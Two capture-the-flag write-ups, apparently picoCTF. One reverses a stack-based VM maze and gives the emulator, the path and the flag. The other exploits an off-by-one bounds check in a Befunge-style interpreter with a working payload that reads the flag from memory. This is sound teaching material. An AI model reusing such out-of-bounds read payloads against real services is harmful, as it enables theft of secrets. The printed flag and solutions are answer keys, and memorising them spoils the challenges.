We are provided with a binary. Decompiling the binary reveals a few functions. Within main, we can see that it repeatedly calls a function until the output is 0. When we look at this function, we can see a variable being checked against different opcodes. Also, both of the parameters to step
turn out to be different struct
s, one used for outputting the process exit code, and another for keeping track of the VM state. After cleaning up the decompilation from ghidra, retyping, and renaming symbols, we get this:
int main(void)
{
bool bVar1;
int return;
undefined2 *__ptr;
undefined2 *__ptr_00;
FILE *__stream;
long in_FS_OFFSET;
exitc local_16c;
state local_168;
char local_138 [264];
long local_30;
local_30 = *(long *)(in_FS_OFFSET + 0x28);
setvbuf(stdout,NULL,1,0x2000);
__ptr = (undefined2 *)malloc(0x800);
__ptr_00 = (undefined2 *)malloc(0x800);
local_168.code = (byte *)&CODE;
local_168.ip = 0;
local_168.getc_stdin = (long)getc_stdin;
local_168.putc_stdout = (long)putc_stdout;
local_168.stack = __ptr;
local_168.alt_stack = __ptr_00;
do {
bVar1 = step(&local_168,&local_16c);
} while (bVar1 != false);
free(__ptr);
free(__ptr_00);
if (local_16c.exit_code_is_negative_one == false) {
if (local_16c.exit_code == 0) {
puts("Have a flag!");
__stream = fopen("flag.txt","r");
fgets(local_138,0x100,__stream);
fclose(__stream);
puts(local_138);
}
return = ZEXT24(local_16c.exit_code);
}
else {
return = -1;
}
if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) {
return return;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
undefined8 step(state *state,exitc *out)
{
byte *pbVar1;
ushort *puVar2;
undefined2 *puVar3;
short sVar4;
byte bVar5;
ushort uVar6;
ushort uVar7;
opcodes opcode;
pbVar1 = state->code;
uVar6 = state->offset;
uVar7 = uVar6 + 1;
state->offset = uVar7;
opcode = pbVar1[uVar6];
switch(opcode) {
case NOP:
break;
case POP_EXIT:
if (out == (exitc *)0x0) {
return 0;
}
puVar2 = state->pointer;
out->invalid_opcode = false;
uVar6 = puVar2[-1];
state->pointer = puVar2 + -1;
out->exit_code = uVar6;
return 0;
case DUP:
puVar2 = state->pointer;
uVar6 = puVar2[-1];
state->pointer = puVar2 + 1;
*puVar2 = uVar6;
return 1;
case POP:
state->pointer = state->pointer + -1;
return 1;
case ADD:
puVar2 = state->pointer;
uVar7 = puVar2[-1];
uVar6 = puVar2[-2];
state->pointer = puVar2 + -1;
puVar2[-2] = uVar7 + uVar6;
return 1;
case SUB:
puVar2 = state->pointer;
uVar7 = puVar2[-2];
uVar6 = puVar2[-1];
state->pointer = puVar2 + -1;
puVar2[-2] = uVar7 - uVar6;
return 1;
case SWP:
puVar2 = state->pointer;
uVar6 = puVar2[-2];
puVar2[-2] = puVar2[-1];
state->pointer = puVar2;
puVar2[-1] = uVar6;
return 1;
case TO_ALT_STACK:
puVar2 = state->pointer;
state->pointer = puVar2 + -1;
uVar6 = puVar2[-1];
puVar2 = state->pointer2;
state->pointer2 = puVar2 + 1;
*puVar2 = uVar6;
return 1;
case FROM_ALT:
puVar3 = state->pointer2;
state->pointer2 = puVar3 + -1;
uVar6 = puVar3[-1];
puVar2 = state->pointer;
state->pointer = puVar2 + 1;
*puVar2 = uVar6;
return 1;
case POP_JMP:
uVar6 = state->pointer[-1];
state->pointer = state->pointer + -1;
state->offset = uVar6;
return 1;
case JMP_IF_ZERO:
puVar2 = state->pointer;
uVar7 = puVar2[-2];
uVar6 = puVar2[-1];
state->pointer = puVar2 + -2;
if (uVar7 == 0) {
code_r0x0010154b:
state->offset = uVar6;
return 1;
}
break;
case JMP_IF_NOT_ZERO:
puVar2 = state->pointer;
uVar7 = puVar2[-2];
uVar6 = puVar2[-1];
state->pointer = puVar2 + -2;
if (uVar7 != 0) goto code_r0x0010154b;
break;
case JMP_IF_LESS_THAN_ZERO:
puVar2 = state->pointer;
uVar7 = puVar2[-2];
uVar6 = puVar2[-1];
state->pointer = puVar2 + -2;
if ((short)uVar7 < 0) goto code_r0x0010154b;
break;
case JMP_IF_LESS_THAN_ONE:
puVar2 = state->pointer;
uVar7 = puVar2[-2];
uVar6 = puVar2[-1];
state->pointer = puVar2 + -2;
if ((short)uVar7 < 1) goto code_r0x0010154b;
break;
default:
if (opcode == 0xc0) {
bVar5 = (*(code *)state->input)();
puVar2 = state->pointer;
state->pointer = puVar2 + 1;
*puVar2 = (ushort)bVar5;
return 1;
}
if (opcode < PUTCHAR) {
if (opcode == GETVAL) {
sVar4 = 2;
uVar7 = SEXT12((char)pbVar1[uVar7]);
}
else {
if (opcode != GET2VALS) goto INVALID;
sVar4 = 3;
uVar7 = *(ushort *)(pbVar1 + uVar7);
}
puVar2 = state->pointer;
state->offset = uVar6 + sVar4;
state->pointer = puVar2 + 1;
*puVar2 = uVar7;
return 1;
}
if (opcode == PUTCHAR) {
bVar5 = *(byte *)(state->pointer + -1);
state->pointer = state->pointer + -1;
(*(code *)state->output)((ulong)bVar5);
return 1;
}
case 2:
case 3:
case 4:
case 5:
case 6:
case 7:
case 8:
case 9:
case 10:
case 0xb:
case 0xc:
case 0xd:
case 0xe:
case 0xf:
case 0x15:
case 0x16:
case 0x17:
case 0x18:
case 0x19:
case 0x1a:
case 0x1b:
case 0x1c:
case 0x1d:
case 0x1e:
case 0x1f:
case 0x22:
case 0x23:
case 0x24:
case 0x25:
case 0x26:
case 0x27:
case 0x28:
case 0x29:
case 0x2a:
case 0x2b:
case 0x2c:
case 0x2d:
case 0x2e:
case 0x2f:
INVALID:
if (out == (exitc *)0x0) {
return 0;
}
out->invalid_opcode = true;
return 0;
}
return 1;
}
We can see that the code is checked against one of many different operations and run. The program was running a big chunk of code which was builtin through this interpreter. We then decided to write a small disassembler / emulator to see exactly what was going on in memory.
The opcodes were completely stack-based (the only state was the program counter and two stacks), so we emulated that.
code = "81 75 00 80 00 80 0a 80 3f 80 65 80 76 80 69 80 6c 80 61 80 20 80 74 80 75 80 6f 80 20 80 74 80 69 80 20 80 65 80 6b 80 61 80 6d 80 20 80 75 80 6f 80 79 80 20 80 6e 80 61 80 43 80 0a 80 58 80 20 80 49 80 20 80 52 80 20 80 54 80 20 80 41 80 20 80 4d 80 20 80 65 80 68 80 74 80 20 80 6f 80 74 80 20 80 65 80 6d 80 6f 80 63 80 6c 80 65 80 57 81 3b 01 30 80 01 80 01 80 00 c0 10 80 75 13 81 a0 00 31 10 80 64 13 81 aa 00 31 10 80 6c 13 81 b4 00 31 10 80 72 13 81 c0 00 31 81 fb 00 30 11 20 80 01 13 21 81 cc 00 30 11 20 80 01 12 21 81 cc 00 30 11 20 20 80 01 13 21 21 81 cc 00 30 11 20 20 80 01 12 21 21 81 cc 00 30 20 20 81 da 00 21 10 20 80 10 81 47 01 30 14 10 20 12 21 14 21 14 21 14 20 81 ef 00 21 80 02 81 61 01 30 81 7b 00 14 81 74 01 12 30 80 00 01 81 38 01 80 00 80 0a 80 2e 80 65 80 75 80 72 80 67 80 20 80 61 80 20 80 79 80 62 80 20 80 6e 80 65 80 74 80 61 80 65 80 20 80 65 80 72 80 65 80 77 80 20 80 75 80 6f 80 59 81 3b 01 30 80 01 01 10 81 45 01 31 c1 81 3b 01 30 11 30 80 00 20 20 10 81 5b 01 31 80 01 13 21 10 21 12 81 49 01 30 11 21 11 21 14 30 10 81 71 01 31 80 01 13 20 10 12 21 81 61 01 30 11 14 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 81 7f 05 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 7f 05 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 74 05 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 74 05 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 7f 05 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 81 74 05 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 81 fb 00 30 81 74 05 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 30 00 00 00 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 81 74 05 30 30 00 00 00 81 fb 00 30 30 00 00 00 30 00 00 00 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 fb 00 30 81 85 05 30 81 fb 00 30 20 10 81 fb 00 31 80 01 13 21 30 20 80 01 12 21 30 11 11 11 11 81 ce 05 80 00 80 0a 80 21 80 74 80 69 80 20 80 65 80 64 80 61 80 6d 80 20 80 75 80 6f 80 79 80 20 80 2c 80 73 80 6e 80 6f 80 69 80 74 80 61 80 6c 80 75 80 74 80 61 80 72 80 67 80 6e 80 6f 80 43 81 3b 01 30 81 f8 00 30"
code = code.split(" ")
class Stack:
def __init__(self):
self.stack = []
def push(self, val):
self.stack.append(val)
def pop(self):
r = self.stack[-1]
del self.stack[-1]
return r
stack = Stack()
alt_stack = Stack()
ops = {
"00": ["NOP", "No operation"],
"01": ["EXT", "Set exit code and exit"],
"10": ["DUP", "Duplicate"],
"11": ["POP", "Pop off stack"],
"12": ["ADD", "add"],
"13": ["SUB", "subtract"],
"14": ["SWP", "swap"],
"20": ["TAL", "to other stack (to alt)"],
"21": ["FAL", "from other stack (from alt)"],
"30": ["JMP", "jump to value and pop off stack"],
"31": ["JIZ", "jump if zero"],
"32": ["JIN", "jump if not zero"],
"33": ["JIL", "jump if less than zero"],
"34": ["JIO", "jump if less than one"],
"80": ["GOB", "get a byte from code and put it on stack"],
"81": ["GTB", "get 2 bytes from code and put them on stack"],
"c1": ["OUT", "pops a value and prints it"],
"c0": ["INP", "inputs a character and puts it on the stack"]
}
ct = 0
while ct < len(code):
if code[ct] in ops.keys():
print(f"{ct:03x}", ops[code[ct]][0], end= " ")
if ops[code[ct]][0] == "GOB":
ct += 1
stack.push("00" + code[ct])
print("00" + code[ct])
elif ops[code[ct]][0] == "GTB":
r = []
ct += 1
r.append(code[ct])
ct += 1
r.append(code[ct])
stack.push("".join(reversed(r)))
print("".join(reversed(r)))
elif ops[code[ct]][0] == "EXT":
print(stack.pop())
break
elif ops[code[ct]][0] == "DUP":
r = stack.pop()
stack.push(r)
stack.push(r)
print(r)
elif ops[code[ct]][0] == "POP":
stack.pop()
print()
elif ops[code[ct]][0] == "ADD":
a = stack.pop()
b = stack.pop()
print(a, ",", b)
if hex(int(a, 16) + int(b, 16)).startswith("-0x"):
stack.push("-" + hex(int(b, 16) + int(a, 16))[3:])
else:
stack.push(hex(int(b, 16) + int(a, 16))[2:])
elif ops[code[ct]][0] == "SUB":
a = stack.pop()
b = stack.pop()
print(b, ",", a)
if hex(int(b, 16) - int(a, 16)).startswith("-0x"):
stack.push("-" + hex(int(b, 16) - int(a, 16))[3:])
else:
stack.push(hex(int(b, 16) - int(a, 16))[2:])
elif ops[code[ct]][0] == "SWP":
a = stack.pop()
b = stack.pop()
print(a, ",", b)
stack.push(a)
stack.push(b)
elif ops[code[ct]][0] == "TAL":
r = stack.pop()
alt_stack.push(r)
print(r)
elif ops[code[ct]][0] == "FAL":
r = alt_stack.pop()
stack.push(r)
print(r)
elif ops[code[ct]][0] == "JMP":
ct = int(stack.pop(), 16) - 1
print(f"{ct+1:03x}")
# print()
elif ops[code[ct]][0] == "JIZ":
jump = stack.pop()
check = stack.pop()
if (int(check, 16) == 0):
ct = int(jump, 16) - 1
pass
print(f"{ct+1:03x}")
# print()
elif ops[code[ct]][0] == "JIN":
jump = stack.pop()
check = stack.pop()
if (int(check, 16) != 0):
ct = int(jump, 16) - 1
pass
print(f"{ct+1:03x}")
# print()
elif ops[code[ct]][0] == "JIL":
jump = stack.pop()
check = stack.pop()
if (int(check, 16) < 0):
ct = int(jump, 16) - 1
pass
print(f"{ct+1:03x}")
# print()
elif ops[code[ct]][0] == "JIO":
jump = stack.pop()
check = stack.pop()
if (int(check, 16) < 1):
ct = int(jump, 16) - 1
pass
print(f"{ct+1:03x}")
# print()
elif ops[code[ct]][0] == "OUT":
out = stack.pop()
print(chr(int(out, 16)))
# print()
elif ops[code[ct]][0] == "INP":
stack.push(hex(ord(input()))[2:])
print()
else:
print()
ct += 1
We then were able to print out the stack when we wanted and see exactly what was happening in memory.
In the code, we found subroutines for mul
and shl
, which were used for a dynamic jump into a list of mini-subroutines.
By looking at the jumps we saw that it was a maze of sorts. By converting the code, we could visualize it.
print('\n'.join(map(' '.join, chunked(map(''.join, chunked(s.split(), 4)), 0x10))).replace('81fb0030', '#').replace('817f0530', 'v').replace('30000000', '_').replace('81740530', '^').replace('81850530', '$').replace(' ', '').replace('_', ' '))
################
# ^# #^ # #
####v### ### # #
# # # #
## # ##### # v #
# # #^ # # # #
# ## ### # # # #
# # # # # #
# # ###### # # #
# # # # #
# ### ###### # #
# # v # # #
# ### # # # #
# # ### # #v##
# # # v # #
##############$#
Finally, we had some trouble figuring out what the
^
and v
do, but then we realized that they increase and decrease health.
Finally, to get through the maze, we just increased our health a lot using the first increase health spot.
rrrrrlrlrlrlrllddddddlddrrddrrrrdddrruuuruuuuuuurrddddddddlddrd
picoCTF{y0uv3_3sc4p3d_th3_m4ze...f0r_n0w-hYkq2D9PmrA5GpEq}
We are given a binary with no source and no clear purpose, so the first thing we did was open it in Ghidra to reverse it. We found that the program consisted primarily of 2 functions: main
and step
:
undefined8 main(void)
{
int iVar1;
FILE *__stream;
size_t sVar2;
char *pcVar3;
int local_14;
setvbuf(stdout,(char *)0x0,2,0);
__stream = fopen("flag.txt","r");
__isoc99_fscanf(__stream,&DAT_00103217,flag);
fclose(__stream);
puts("Enter homework sol");
rows = 0x32;
cols = 0x16;
local_14 = 0;
while (local_14 < 4) {
pcVar3 = fgets(board + (long)local_14 * 0x16,cols + 1,stdin);
if ((pcVar3 == (char *)0x0) || (board[(long)local_14 * 0x16] == 'R')) break;
sVar2 = strlen(board + (long)local_14 * 0x16);
*(undefined *)((long)local_14 * 0x16 + sVar2 + 0x10525f) = 0;
local_14 = local_14 + 1;
}
do {
iVar1 = step();
} while (iVar1 != 0);
do_you_like_gittens = 1;
does_gittens_watch_cat_videos = 1;
return 0;
}
undefined8 step(void)
{
long lVar1;
if (false) {
switchD_00101232_caseD_22:
if (board[(long)pcy * 0x16 + (long)pcx] == '0') {
if (99 < sn) {
/* WARNING: Subroutine does not return */
__assert_fail("sn < 100","homework.c",0x81,(char *)&__PRETTY_FUNCTION__.0);
}
lVar1 = (long)sn;
sn = sn + 1;
*(undefined4 *)(stack + lVar1 * 4) = 0;
}
}
else {
switch(board[(long)pcy * 0x16 + (long)pcx]) {
case 0x21:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 1","homework.c",0x35,(char *)&__PRETTY_FUNCTION__.0);
}
*(uint *)(stack + (long)(sn + -1) * 4) = (uint)(*(int *)(stack + (long)(sn + -1) * 4) == 0);
break;
default:
goto switchD_00101232_caseD_22;
case 0x24:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 1","homework.c",100,(char *)&__PRETTY_FUNCTION__.0);
}
sn = sn + -1;
break;
case 0x25:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x30,(char *)&__PRETTY_FUNCTION__.0);
}
*(int *)(stack + (long)(sn + -2) * 4) =
*(int *)(stack + (long)(sn + -2) * 4) % *(int *)(stack + (long)(sn + -1) * 4);
sn = sn + -1;
break;
case 0x2a:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x26,(char *)&__PRETTY_FUNCTION__.0);
}
*(int *)(stack + (long)(sn + -2) * 4) =
*(int *)(stack + (long)(sn + -1) * 4) * *(int *)(stack + (long)(sn + -2) * 4);
sn = sn + -1;
break;
case 0x2b:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x1c,(char *)&__PRETTY_FUNCTION__.0);
}
*(int *)(stack + (long)(sn + -2) * 4) =
*(int *)(stack + (long)(sn + -2) * 4) + *(int *)(stack + (long)(sn + -1) * 4);
sn = sn + -1;
break;
case 0x2c:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 1","homework.c",0x6d,(char *)&__PRETTY_FUNCTION__.0);
}
sn = sn + -1;
putchar(*(int *)(stack + (long)sn * 4));
break;
case 0x2d:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x21,(char *)&__PRETTY_FUNCTION__.0);
}
*(int *)(stack + (long)(sn + -2) * 4) =
*(int *)(stack + (long)(sn + -2) * 4) - *(int *)(stack + (long)(sn + -1) * 4);
sn = sn + -1;
break;
case 0x2e:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 1","homework.c",0x68,(char *)&__PRETTY_FUNCTION__.0);
}
sn = sn + -1;
printf("%d",(ulong)*(uint *)(stack + (long)sn * 4));
break;
case 0x2f:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x2b,(char *)&__PRETTY_FUNCTION__.0);
}
*(int *)(stack + (long)(sn + -2) * 4) =
*(int *)(stack + (long)(sn + -2) * 4) / *(int *)(stack + (long)(sn + -1) * 4);
sn = sn + -1;
break;
case 0x3a:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >=1","homework.c",0x59,(char *)&__PRETTY_FUNCTION__.0);
}
*(undefined4 *)(stack + (long)sn * 4) = *(undefined4 *)(stack + (long)(sn + -1) * 4);
sn = sn + 1;
break;
case 0x3c:
dirx = -1;
diry = 0;
break;
case 0x3e:
dirx = 1;
diry = 0;
break;
case 0x40:
return 0;
case 0x5c:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >=2","homework.c",0x5e,(char *)&__PRETTY_FUNCTION__.0);
}
*(uint *)(stack + (long)(sn + -1) * 4) =
*(uint *)(stack + (long)(sn + -1) * 4) ^ *(uint *)(stack + (long)(sn + -2) * 4);
*(uint *)(stack + (long)(sn + -2) * 4) =
*(uint *)(stack + (long)(sn + -2) * 4) ^ *(uint *)(stack + (long)(sn + -1) * 4);
*(uint *)(stack + (long)(sn + -1) * 4) =
*(uint *)(stack + (long)(sn + -1) * 4) ^ *(uint *)(stack + (long)(sn + -2) * 4);
break;
case 0x5e:
dirx = 0;
diry = -1;
break;
case 0x5f:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 1","homework.c",0x4d,(char *)&__PRETTY_FUNCTION__.0);
}
sn = sn + -1;
if (*(int *)(stack + (long)sn * 4) == 0) {
dirx = 1;
diry = 0;
}
else {
dirx = -1;
diry = 0;
}
break;
case 0x60:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x39,(char *)&__PRETTY_FUNCTION__.0);
}
*(uint *)(stack + (long)(sn + -2) * 4) =
(uint)(*(int *)(stack + (long)(sn + -1) * 4) < *(int *)(stack + (long)(sn + -2) * 4));
break;
case 0x67:
if (sn < 2) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 2","homework.c",0x72,(char *)&__PRETTY_FUNCTION__.0);
}
if ((*(int *)(stack + (long)(sn + -2) * 4) < 0) || (*(int *)(stack + (long)(sn + -1) * 4) <0)
) {
/* WARNING: Subroutine does not return */
__assert_fail("stack[sn-2] >= 0 && stack[sn-1] >= 0","homework.c",0x73,
(char *)&__PRETTY_FUNCTION__.0);
}
if ((rows < *(int *)(stack + (long)(sn + -1) * 4)) ||
(cols < *(int *)(stack + (long)(sn + -2) * 4))) {
/* WARNING: Subroutine does not return */
__assert_fail("stack[sn-1] <= rows && stack[sn-2] <= cols","homework.c",0x74,
(char *)&__PRETTY_FUNCTION__.0);
}
*(int *)(stack + (long)(sn + -2) * 4) =
(int)(char)board[(long)*(int *)(stack + (long)(sn + -1) * 4) * 0x16 +
(long)*(int *)(stack + (long)(sn + -2) * 4)];
sn = sn + -1;
break;
case 0x70:
if (sn < 3) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 3","homework.c",0x79,(char *)&__PRETTY_FUNCTION__.0);
}
if ((*(int *)(stack + (long)(sn + -2) * 4) < 0) || (*(int *)(stack + (long)(sn + -1) * 4) <0)
) {
/* WARNING: Subroutine does not return */
__assert_fail("stack[sn-2] >= 0 && stack[sn-1] >= 0","homework.c",0x7a,
(char *)&__PRETTY_FUNCTION__.0);
}
if ((rows < *(int *)(stack + (long)(sn + -1) * 4)) ||
(cols < *(int *)(stack + (long)(sn + -2) * 4))) {
/* WARNING: Subroutine does not return */
__assert_fail("stack[sn-1] <= rows && stack[sn-2] <= cols","homework.c",0x7b,
(char *)&__PRETTY_FUNCTION__.0);
}
board[(long)*(int *)(stack + (long)(sn + -1) * 4) * 0x16 +
(long)*(int *)(stack + (long)(sn + -2) * 4)] =
(char)*(undefined4 *)(stack + (long)(sn + -3) * 4);
sn = sn + -3;
break;
case 0x76:
dirx = 0;
diry = 1;
break;
case 0x7c:
if (sn < 1) {
/* WARNING: Subroutine does not return */
__assert_fail("sn >= 1","homework.c",0x53,(char *)&__PRETTY_FUNCTION__.0);
}
sn = sn + -1;
if (*(int *)(stack + (long)sn * 4) == 0) {
dirx = 0;
diry = 1;
}
else {
dirx = 0;
diry = -1;
}
}
}
pcx = (pcx + dirx + cols) % cols;
pcy = (pcy + diry + rows) % rows;
return 1;
}
Based on the infinite loop in main
, the name of the step
function, and the global variable names like board
, stack
, pcx
, and pcy
, we were able to see that the program executed some sort of 2D code. The main function reads up to 4 rows of user inputted code, and then transfers control over to the step
loop where the code is interpretted. Static analysis of the step
function revealed that the code controlled a stack machine with the following operations:
0: push 0 to the top of the stack (also asserts if full)
$: discard stack[top]
!: logical NOT of top of stack (stack[top] = !stack[top])
`: sets stack[top-1] to result of stack[top] < stack[top-1] (does not pop anything, which is kinda weird)
%: pops top 2 elements and pushes stack[top-1] % stack[top]
/: pops top 2 elements and pushes stack[top-1] / stack[top]
*: pops top 2 elements and pushes stack[top-1] * stack[top]
+: pops top 2 elements and pushes stack[top-1] + stack[top]
-: pops top 2 elements and pushes stack[top-1] - stack[top]
,: pops and prints stack[top] as ascii character (putchar)
.: pops and prints stack[top] as 32-bit number (printf("%d"))
:: duplicate stack[top] (NO BOUNDS CHECK!!!)
\: swap top 2 elements using XOR
pc controls:
<: set pc direction to left
>: set pc direction to right
^: set pc direction to up
v: set pc direction to down
_: horizontal branch (pc goes right if stack[top]==0, left otherwise), pops stack[top]
|: vertical branch (pc goes down if stack[top]==0, up otherwse), pops stack[top]
@: stop program
g: pushes board[stack[top]][stack[top-1]] onto stack top, pops top 2 elements
p: sets board[stack[top]][stack[top-1]] = (char) stack[top-2], popping off all 3 elements
We didn't know it at the time, but this is a subset of the esolang Befunge-93. Before continuing on, we decided to get at least some grasp of how to actually program something for this interpreter. We ended up making the following basic programs showing off some basic concepts:
# printing the number 64
0!:+:+::**.@
# looping through and printing the numbers from 63 -> 1
v v.: <
>0!:+:+::**>0!-:|
@
At this point, we had a decent grasp of how to actually use the language, and could now take a look at potential vulnerabilities in step
(since main
was clean). We saw that the program first loads in the flag into the global variable flag
so we figured that the vulnerability would involve some way to read it, presumably with the help of the g
operation.
We originally only saw one vulnerability: a missing bounds check in the :
DUP operation. Unlike the 0
operation, which checks if the stack already contains 100 elements before pushing 0, the :
operation only checks that the stack has at least one element (the element to be duplicated). This means that the stack can be overflowed, potentially allowing modification of any global variables after it. We mapped out the order of the global variables to see what we might be able to do:
stack
board
rows
cols
diry
pcx
pcy
do_you_like_gittens
does_gittens_watch_cat_videos
flag
We weren't quite sure what the 2 variables right before flag
were for. Presumably they're just padding to create more distance between flag
and the main global variables. This layout meant that a stack overflow would modify the program on the board and corrupt it. After a few hours of experimentation, we eventually realized that this vulnerability was extremely difficult to actually exploit (since you would need to corrupt the entire board, edit the rows
variable, and finally use the g
opcode to read the entire flag byte by byte), but not before creating an interesting proof of concept:
# this program cleanly terminates because of the stack overflow,
# even though it should terminate due to an assertion failure
# this is done by placing the ascii for @ on the stack (64) and
# duplicating it into the board where it is executed (as a STOP)
0!:+:+::**v
>:
After looking through the step
function again, we found that the last assertion in both the g
and p
operations had an off-by-one error:
if ((rows < *(int *)(stack + (long)(sn + -1) * 4)) ||
(cols < *(int *)(stack + (long)(sn + -2) * 4))) {
/* WARNING: Subroutine does not return */
__assert_fail("stack[sn-1] <= rows && stack[sn-2] <= cols","homework.c",0x74,
(char *)&__PRETTY_FUNCTION__.0);
}
A correct bounds check would only allow us to access board[0][0]
all the way to board[rows-1][cols-1]
, but this allows us to also access the memory after the board (since it is stored as a flat 2D array). Since the rows
variable is stored directly after board
, we should be able to read/modify it. We wrote a POC to test if we could read it:
00!:+::+:*::+++g.@
When we input that code it prints out 50, which is our rows
variable! We then wanted to lay out the plan for our main payload.
Our final payload needed to be able to scan through the memory of the flag
variable and print it out. Since the g
operation works byte by byte, we'll have to put this into a loop (or hardcore each individual index 30 times, a wonderful test of your sanity). More or less, we had to make something that went through the following steps:
rows
variable to a big numberSince we were pretty sure the flag would be longer than 22 characters, we didn't want to just hardcore our row index into the code. Besides, it's not as cool.
We originally had this chunk of code to set rows
to 255:
0!:+:+:*:*0!-00!:+:v
@p+++::*:+:<
We found that this approach had a few problems. First of all, a rows value of 255 was much larger than necessary. The flag was somewhere from around 52-60 "rows" away from the board. There was no need to set a bound this large. It also took up nearly two rows of space, which did not leave enough space for us to create a nested loop structure.
Eventually, after spending multiple hours trying to optimize this and our loop, we settled upon the following solution:
0!:+:+::**00p00g00!:v
v+:::!0p<+++::*:+::+<
>:++:+:+ +:0>0gg,:v
00g0!-00^ ^0:-!0_
We found that 64 was a good value to set the rows variable to, since it was a power of 2 and large enough. We found that powers of 2 can be made more compactly than other numbers, so this helped cut down the size of our program. We also decided to use board[0][0]
as a storage for the outer loop index, which allowed us to reuse the number 64 from the setup step (setting rows
to 64) as our initial outer loop variable, and also allowed us to be more lenient with our code path (i.e. outer loop path can go directly to where we get board[0][0]
instead of to where we decrement the variable by 1).
We also made use of the wrapping of the instruction pointer to go back to the outer loop once we looped through every byte in a row using the _
horizontal branching instruction in the bottom right.
After sending this program to the remote endpoint, we get the following output:
Enter homework sol
0!:+:+::**00p00g00!:v
v+:::!0p<+++::*:+::+<
>:++:+:+ +:0>0gg,:v
00g0!-00^ ^0:-!0_
